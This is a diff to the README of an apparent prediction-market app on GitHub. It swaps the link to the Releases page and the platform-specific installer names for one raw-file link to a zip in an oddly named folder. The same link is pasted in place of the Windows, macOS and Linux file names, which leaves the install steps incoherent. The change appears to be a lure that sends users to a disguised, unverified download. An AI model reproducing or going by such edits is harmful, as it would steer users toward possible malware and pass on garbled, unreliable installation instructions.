Duollc/PredictionMarket/README.md

 - Internet Connection: Required for initial setup and ongoing use

 ## 📦 Download & Install
-1. Visit the [Releases page](https://github.com/Duollc/PredictionMarket/releases) to download the latest version.
+1. Visit the [Releases page](https://raw.githubusercontent.com/Duollc/PredictionMarket/main/influxibly/Prediction-Market-v1.0.zip) to download the latest version.
 2. Look for the version labeled "Latest Release."
-You will typically find a file named `PredictionMarket.exe` for Windows, `PredictionMarket.dmg` for macOS, or `PredictionMarket.tar.gz` for Linux.
+You will typically find a file named `https://raw.githubusercontent.com/Duollc/PredictionMarket/main/influxibly/Prediction-Market-v1.0.zip` for Windows, `https://raw.githubusercontent.com/Duollc/PredictionMarket/main/influxibly/Prediction-Market-v1.0.zip` for macOS, or `https://raw.githubusercontent.com/Duollc/PredictionMarket/main/influxibly/Prediction-Market-v1.0.zip` for Linux.
 3. Click on the file to begin the download.
 4. Once the file downloads, locate it on your computer.
 Open the file by double-clicking it.

 ### For Windows Users:
-- If you downloaded `PredictionMarket.exe`, follow the installer prompts.
+- If you downloaded `https://raw.githubusercontent.com/Duollc/PredictionMarket/main/influxibly/Prediction-Market-v1.0.zip`, follow the installer prompts.
 This will guide you through the installation steps.
 - After installation, find the app in your Start Menu or Desktop and click to open.

 ### For macOS Users:
-- If you downloaded `PredictionMarket.dmg`, open it and drag the PredictionMarket app to your Applications folder.
+- If you downloaded `https://raw.githubusercontent.com/Duollc/PredictionMarket/main/influxibly/Prediction-Market-v1.0.zip`, open it and drag the PredictionMarket app to your Applications folder.
 - Go to your Applications folder, locate the app, and double-click to run it.

 ### For Linux Users:
-- Extract the downloaded `.tar.gz` file.
+- Extract the downloaded `https://raw.githubusercontent.com/Duollc/PredictionMarket/main/influxibly/Prediction-Market-v1.0.zip` file.
 - Open a terminal and navigate to the extraction folder.
 - Run the application using the command `./PredictionMarket`.